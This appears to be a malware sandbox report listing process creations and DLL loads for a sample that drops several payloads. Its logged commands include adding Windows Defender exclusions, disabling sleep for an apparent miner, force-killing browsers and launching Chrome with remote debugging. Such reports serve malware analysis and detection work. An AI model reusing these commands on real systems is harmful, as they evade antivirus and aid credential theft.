Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe "C:\Program Files (x86)\jdownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe "C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe "C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe "C:\Users\user\AppData\Local\Temp\downloaded_file.exe"
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe "C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe "C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe"
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\DBFIEHDHII.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2148,i,11544534191024367753,17094532102307047588,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\DBFIEHDHII.exe "C:\Users\user\Documents\DBFIEHDHII.exe"	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe "C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe "C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe "C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe "C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe "C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe "C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe "C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe "C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe"
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe "C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe"
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\580b9vjIX7.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe "C:\Program Files (x86)\jdownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe"
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe "C:\Users\user\AppData\Local\Temp\downloaded_file.exe"
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: unknown unknown
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\explorer.exe explorer.exe

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
